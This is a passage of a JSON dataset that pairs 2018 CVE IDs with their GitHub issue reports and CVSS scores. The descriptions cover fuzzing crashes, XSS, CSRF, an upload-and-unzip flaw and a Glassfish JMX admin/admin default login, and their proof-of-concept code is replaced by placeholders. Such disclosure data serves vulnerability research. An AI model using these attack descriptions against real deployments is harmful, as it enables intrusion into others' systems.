        "description": "stack buffer overflow in varible keys_inst. Hello,I use my company tools to fuzz test on sela.I first found the APITAG I want to show error information to your guys.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-11694",
        "Issue_Url_old": "https://github.com/sass/libsass/issues/2663",
        "Issue_Url_new": "https://github.com/sass/libsass/issues/2663",
        "Repo_new": "sass/libsass",
        "Issue_Created_At": "2018-06-03T02:24:31Z",
        "description": "APITAG null pointer dereference (SEGV) in APITAG ( PATHTAG ). Hey there, I have discovered a null pointer dereference in libsass at: APITAG URLTAG Found when fuzzing commit APITAG of libsass, using commit aa6d5c6 URLTAG of sassc as a harness. Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in libsass releases from FILETAG until the commit listed above. You can find a collection of APITAG files that trigger the bug FILETAG . The full ASAN report is shown below: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12052",
        "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/3",
        "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/3",
        "Repo_new": "unh3x/just4cve",
        "Issue_Created_At": "2018-06-07T01:42:54Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12503",
        "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/81",
        "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/81",
        "Repo_new": "syoyo/tinyexr",
        "Issue_Created_At": "2018-06-16T11:25:40Z",
        "description": "Heap buffer overflow in APITAG I build tinyexr with clang and address sanitizer. When testcase (see: URLTAG is input into test_tinyexr (command: ./test_tinyexr testcase), a heap buffer overflow has triggered NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG e0 at pc NUMBERTAG c NUMBERTAG bp NUMBERTAG ffe NUMBERTAG d NUMBERTAG sp NUMBERTAG ffe NUMBERTAG d NUMBERTAG READ of size NUMBERTAG at NUMBERTAG e0 thread T NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG f in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f5e NUMBERTAG e9e NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG b3e8 in _start ( PATHTAG NUMBERTAG e0 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG a8 in operator new(unsigned long) PATHTAG NUMBERTAG b3f4 in APITAG char>::allocate(unsigned long, void const ) PATHTAG NUMBERTAG b3f4 in APITAG char> APITAG char>&, unsigned long) PATHTAG NUMBERTAG b3f4 in APITAG char, std::allocator<unsigned char> >::_M_allocate(unsigned long) PATHTAG NUMBERTAG b3f4 in APITAG char, std::allocator<unsigned char> >::_M_create_storage(unsigned long) PATHTAG NUMBERTAG b3f4 in APITAG char, std::allocator<unsigned char> APITAG long, std::allocator<unsigned char> const&) PATHTAG NUMBERTAG b3f4 in std::vector<unsigned char, std::allocator<unsigned char> >::vector(unsigned long, std::allocator<unsigned char> const&) PATHTAG NUMBERTAG b3f4 in APITAG PATHTAG NUMBERTAG f in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f5e NUMBERTAG e9e NUMBERTAG f in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa]fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12504",
        "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/82",
        "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/82",
        "Repo_new": "syoyo/tinyexr",
        "Issue_Created_At": "2018-06-16T11:26:12Z",
        "description": "Assert failure. When testcase (see: URLTAG is input into test_tinyexr (command: ./test_tinyexr testcase), a assert failure problem is triggered in APITAG test_tinyexr: . APITAG void APITAG , int , size_t , int, const APITAG ): Assertion NUMBERTAG failed. Aborted",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12600",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1178",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1178",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-06-19T13:48:40Z",
        "description": "out of bounds write in dib.c. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description CODETAG Similar to URLTAG the APITAG in coders/dib.c may cause an out of bounds write bug Steps to Reproduce In coders/dib.c ERRORTAG (image >rows y NUMBERTAG bytes_per_line may be much larger than APITAG will cause an out of bounds write bug in line NUMBERTAG of coders/dib.c To reproduce this problem: ERRORTAG Debugging information\uff1a ERRORTAG POC FILETAG System Configuration APITAG APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on):ubuntu NUMBERTAG Additional information: Credit: Zongming Wang from Chengdu Security Response Center of Qihoo NUMBERTAG Technology Co. Ltd.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12654",
        "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/98",
        "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/98",
        "Repo_new": "slims/slims8_akasia",
        "Issue_Created_At": "2018-06-21T03:22:13Z",
        "description": "FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12680",
        "Issue_Url_old": "https://github.com/Tanganelli/CoAPthon/issues/135",
        "Issue_Url_new": "https://github.com/tanganelli/coapthon/issues/135",
        "Repo_new": "tanganelli/coapthon",
        "Issue_Created_At": "2018-12-27T14:24:00Z",
        "description": "Denial of Service vulnerability caused by improper exception handling while parsing of APITAG messages. Multiple sample applications from APITAG library are vulnerable to Denial of Service attacks caused by maliciously crafted APITAG messages. Method APITAG improperly handle multiple exception types leading to crash of applications (including standard APITAG server, APITAG client, APITAG reverse proxy, example collect APITAG server and client). Example payloads and unhandled exceptions NUMBERTAG File: ERRORTAG (attached) Error message: File PATHTAG line NUMBERTAG in convert_to_raw return bytearray(value, \"utf NUMBERTAG ERRORTAG 'ascii' codec can't decode byte NUMBERTAG b9 in position NUMBERTAG ordinal not in range NUMBERTAG File: ERRORTAG Error message: File PATHTAG line NUMBERTAG in add_option raise ERRORTAG : %s is not repeatable\", APITAG ERRORTAG APITAG : %s is not repeatable', 'If None Match NUMBERTAG File: ERRORTAG Error message: File PATHTAG line NUMBERTAG in APITAG length = s.unpack_from(values FILETAG Issue was reported via email on NUMBERTAG rd of February NUMBERTAG to APITAG developers and registered in CVE database (reserved id is: CVETAG ).",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12913",
        "Issue_Url_old": "https://github.com/richgel999/miniz/issues/90",
        "Issue_Url_new": "https://github.com/richgel999/miniz/issues/90",
        "Repo_new": "richgel999/miniz",
        "Issue_Created_At": "2018-06-27T09:25:59Z",
        "description": "miniz_tinfl.c NUMBERTAG has an infinite loop. in miniz_tinfl.c NUMBERTAG has an infinite loop,sym2 and counter always equal NUMBERTAG i use example3 to test poc\uff1a FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12971",
        "Issue_Url_old": "https://github.com/teameasy/EasyCMS/issues/3",
        "Issue_Url_new": "https://github.com/teameasy/easycms/issues/3",
        "Repo_new": "teameasy/easycms",
        "Issue_Created_At": "2018-06-28T11:25:28Z",
        "description": "There is a CSRF vulnerability which can delete user account. First I add NUMBERTAG user accounts as ID NUMBERTAG FILETAG We can delete these accounts by submiting this html form. CODETAG FILETAG FILETAG Then the user accounts had been deleted!!! FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-13003",
        "Issue_Url_old": "https://github.com/OpenTSDB/opentsdb/issues/1241",
        "Issue_Url_new": "https://github.com/opentsdb/opentsdb/issues/1241",
        "Repo_new": "opentsdb/opentsdb",
        "Issue_Created_At": "2018-06-29T03:24:39Z",
        "description": "Vul.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-13419",
        "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/398",
        "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/398",
        "Repo_new": "libsndfile/libsndfile",
        "Issue_Created_At": "2018-07-05T10:23:37Z",
        "description": "memory leaks detected. APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG ffff6b3deb7 in psf_allocate APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG in realloc ( PATHTAG NUMBERTAG ffff6b4fb NUMBERTAG in psf_bump_header_allocation APITAG NUMBERTAG ffff6b4fb NUMBERTAG in header_seek APITAG NUMBERTAG ffff6b4fb NUMBERTAG in psf_binheader_readf APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG ffff6bfe0a0 in psf_store_read_chunk APITAG NUMBERTAG ffff6bfe0a0 in psf_store_read_chunk_u NUMBERTAG APITAG NUMBERTAG ffff6c NUMBERTAG PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG ffff6aaed7f in wav_open APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG in realloc ( PATHTAG NUMBERTAG ffff6be NUMBERTAG in psf_store_string APITAG The command line is ./sndfile convert NUMBERTAG wav ./out.prc where NUMBERTAG wav is just a simple wav file.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-13420",
        "Issue_Url_old": "https://github.com/gperftools/gperftools/issues/1013",
        "Issue_Url_new": "https://github.com/gperftools/gperftools/issues/1013",
        "Repo_new": "gperftools/gperftools",
        "Issue_Created_At": "2018-07-06T07:26:30Z",
        "description": "Memory leaks detected . When run program sampler_test, a memory leak has been found ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-13848",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/285",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/285",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2018-07-10T02:27:46Z",
        "description": "A SEGV signal occurred when running mp4compact. A SEGV signal occurred when running mp4compact at APITAG ERRORTAG The testing program is mp4compact. And the input file has been put at: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14015",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/10465",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/10465",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-06-24T12:26:03Z",
        "description": "null pointer error at APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | ELF. | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG c NUMBERTAG a8 commit NUMBERTAG c NUMBERTAG build NUMBERTAG Expected behavior r2 should analyze a elf binary quickly Actual behavior r2 leads to the null pointer error Steps to reproduce the behavior Download FILETAG run r2 A Q $POC The Address Sanitizer output APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-14017",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/10498",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/10498",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-06-26T02:43:50Z",
        "description": "APITAG heap buffer overflow at APITAG | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Java Class | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG c NUMBERTAG a8 commit NUMBERTAG c NUMBERTAG build NUMBERTAG Expected behavior r2 should analyze a java class binary quickly Actual behavior r2 leads to the heap buffer overflow Steps to reproduce the behavior Download POC URLTAG run r2 A Q $POC The Address Sanitizer output APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-14052",
        "Issue_Url_old": "https://github.com/marc-q/libwav/issues/19",
        "Issue_Url_new": "https://github.com/marc-q/libwav/issues/19",
        "Repo_new": "marc-q/libwav",
        "Issue_Created_At": "2018-07-12T11:25:43Z",
        "description": "SEGV in function apply_gain in wav_gain.c. I use Clang NUMBERTAG and APITAG to build libwav , this file URLTAG can cause SEGV signal in function APITAG when running the APITAG in folder APITAG with the following command: APITAG This is the ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14324",
        "Issue_Url_old": "https://github.com/eclipse-ee4j/glassfish/issues/22500",
        "Issue_Url_new": "https://github.com/eclipse-ee4j/glassfish/issues/22500",
        "Repo_new": "eclipse-ee4j/glassfish",
        "Issue_Created_At": "2018-04-20T01:50:23Z",
        "description": "Glassfish jmx_rmi Remote monitoring and control problem. Glassfish jmx_rmi Remote monitoring and control problem Environment Details APITAG Version (and build number NUMBERTAG JDK version NUMBERTAG OS: win7 Problem Description Open demo by default. APITAG will open the NUMBERTAG port by default. And can be remotely accessed. Discover JMX URL: PATHTAG JMX is a weak password. admin/admin Meanwhile, more information is missing from FILETAG . Then click the corresponding function. amx support > operation > APITAG Come out of a amx directory. In amx, may Remotely operated functions such as deleting demo, stopping, closing, creating, and database operation. And there's a lot of server information here. Here is a simple java sample for remote access to information through Glassfish JMX. ERRORTAG Impact of Issue This is originally a remote monitoring performance JMX. I don't want it to be a loophole for others to invade me. I hope you can turn it off by default. He does have a certain degree of harm. It can also be remotely manipulated. Thank you very much. Sorry to disturb you \uff01",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14382",
        "Issue_Url_old": "https://github.com/instantsoft/icms2/issues/892",
        "Issue_Url_new": "https://github.com/instantsoft/icms2/issues/892",
        "Repo_new": "instantsoft/icms2",
        "Issue_Created_At": "2018-07-17T05:26:28Z",
        "description": "Reflect XSS in redirect url . Hello\uff0c I have found a xss in parameter url. XSS POC: URLTAG FILETAG Discovered by zhihua. EMAILTAG .cn(hackyzh)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14423",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1123",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1123",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2018-07-17T02:27:04Z",
        "description": "Division by zero vulnerabilities in the function pi_next_pcrl, pi_next_cprl and pi_next_rpcl in PATHTAG Function pi_next_pcrl, pi_next_cprl and pi_next_rpcl have the division by zero vulnerabilities in PATHTAG CODETAG CODETAG CODETAG This issue is same with NUMBERTAG And the patch should be like the patch for NUMBERTAG and so on. APITAG patch for NUMBERTAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14434",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1192",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1192",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-07-04T03:28:11Z",
        "description": "coders/mpc.c colormap potential memory leak bug. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description a potential memory leak bug locates in coders/miff.c Steps to Reproduce the bug locates in URLTAG the code frament is as follows: the code locates in a if block,and we allocate colormap memory in the if block, we freed it in normal branch\uff0cbut forgot free it in exception branch ERRORTAG credit: APITAG ( \u58a8\u4e91\u79d1\u6280) System Configuration APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14521",
        "Issue_Url_old": "https://github.com/aubio/aubio/issues/187",
        "Issue_Url_new": "https://github.com/aubio/aubio/issues/187",
        "Repo_new": "aubio/aubio",
        "Issue_Created_At": "2018-07-22T11:29:08Z",
        "description": "SEGV signal found when running aubiomfcc. I was running aubiomfcc with a wav file as an input and I got a crash . The address sanitizer reported as: ERRORTAG The input file I give to the program is displayed at: URLTAG The command line is just ./aubiomfcc i testcase1",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14837",
        "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/673",
        "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/673",
        "Repo_new": "wolfcms/wolfcms",
        "Issue_Created_At": "2018-05-03T17:19:44Z",
        "description": "Cross Site Scripting (XSS) Vulnerability in wolfcms NUMBERTAG Hi Team, I have found stored cross site scripting on APITAG NUMBERTAG Description: Cross Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user\u2019s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. Vulnerability Name: Cross Site Scripting Vulnerable URL : URLTAG Steps to Reproduce: Step NUMBERTAG Logged In as a Admin Role Step NUMBERTAG From Snippets Tab edit the Name with APITAG \"> APITAG Step NUMBERTAG It will store the Name as javascript code and it will execute cross site scripting. Vulnerable field is from APITAG tab APITAG Name\" APITAG find attached screenshot) FILETAG XSS Executed Successfully FILETAG It does not sanitize APITAG Name\" from APITAG Tab and it is possible to execute a Stored Cross Site Scripting XSS attacks. Additional information APITAG CMS version NUMBERTAG DB type and version: APITAG NUMBERTAG APITAG >HTTP server type and version: APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-15178",
        "Issue_Url_old": "https://github.com/gogs/gogs/issues/5364",
        "Issue_Url_new": "https://github.com/gogs/gogs/issues/5364",
        "Repo_new": "gogs/gogs",
        "Issue_Created_At": "2018-08-06T06:19:35Z",
        "description": "Insecure function APITAG leads to open redirect vulnerability . Gogs version (or commit ref NUMBERTAG Can you reproduce the bug at FILETAG FILETAG . APITAG gif: FILETAG A positive fix might looks like: CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15567",
        "Issue_Url_old": "https://github.com/boiteasite/cmsuno/issues/7",
        "Issue_Url_new": "https://github.com/boiteasite/cmsuno/issues/7",
        "Repo_new": "boiteasite/cmsuno",
        "Issue_Created_At": "2018-08-10T06:24:19Z",
        "description": "APITAG NUMBERTAG has a XSS vulnerability in title.. CODETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15846",
        "Issue_Url_old": "https://github.com/mattiapazienti/fledrCMS/issues/2",
        "Issue_Url_new": "https://github.com/mattiapazienti/fledrcms/issues/2",
        "Repo_new": "mattiapazienti/fledrcms",
        "Issue_Created_At": "2018-08-06T01:21:25Z",
        "description": "There is a CSRF vulnerability that can modify the administrator's password. There is a CSRF vulnerability that can change the administrator's password via APITAG POC\uff1a APITAG change the administrator's password CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16247",
        "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/3",
        "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/3",
        "Repo_new": "yzmcms/yzmcms",
        "Issue_Created_At": "2018-08-16T05:18:39Z",
        "description": "yzmcms NUMBERTAG SS. FILETAG XSS, payload \uff1a APITAG alert NUMBERTAG APITAG POC\uff1a POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: application/json, text/javascript, / ; q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG Content Length NUMBERTAG Cookie: APITAG APITAG APITAG APITAG APITAG APITAG iCMS_redirect_num NUMBERTAG APITAG joomla_user_state=logged_in; APITAG APITAG APITAG APITAG APITAG Connection: close APITAG APITAG &status NUMBERTAG dosubmit NUMBERTAG FILETAG FILETAG \u2014\u2014\u4e2d\u79d1\u5353\u4fe1\u8f6f\u4ef6\u6d4b\u8bc4\u6280\u672f\u4e2d\u5fc3",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-16370",
        "Issue_Url_old": "https://github.com/lazyphp/PESCMS-TEAM/issues/2",
        "Issue_Url_new": "https://github.com/lazyphp/pescms-team/issues/2",
        "Repo_new": "lazyphp/pescms-team",
        "Issue_Created_At": "2018-08-30T09:23:52Z",
        "description": "PECSM TEAM NUMBERTAG has a file upload vulnerability in APITAG This page let user upgrade the PESCMS system manually. FILETAG Follow the APITAG funtction,the upload file extension must be \u201czip\u201d FILETAG and follow the unzip function FILETAG Follow the APITAG function and install function,we can see the file decompression in root directory FILETAG FILETAG so,we can create a FILETAG FILETAG and compression it as FILETAG ,and upload the FILETAG , FILETAG at last ,the system decompress evil.zip and FILETAG in root directory. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-16379",
        "Issue_Url_old": "https://github.com/n00dles/ogma-CMS/issues/38",
        "Issue_Url_new": "https://github.com/n00dles/ogma-cms/issues/38",
        "Repo_new": "n00dles/ogma-CMS",
        "Issue_Created_At": "2018-08-10T02:20:41Z",
        "description": "There have XSS vulnerability that can excute javascript. There is a XSS vulnerability Open this url \u201c URLTAG \u201c and login in. Select APITAG Options\" Insert the payload APITAG APITAG \" in APITAG Text footer\" and submit. FILETAG Press F NUMBERTAG to open the developer tools. We can see that this dangerous XSS script was inserted into the page without any filtering. CODETAG This means that the script will be executed when the page is opened, which is dangerous. FILETAG Then we go to the homepage \u201c FILETAG \u201d This malicious XSS script is triggered and a pop up dialog displays the current user's cookie value. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-16384",
        "Issue_Url_old": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1167",
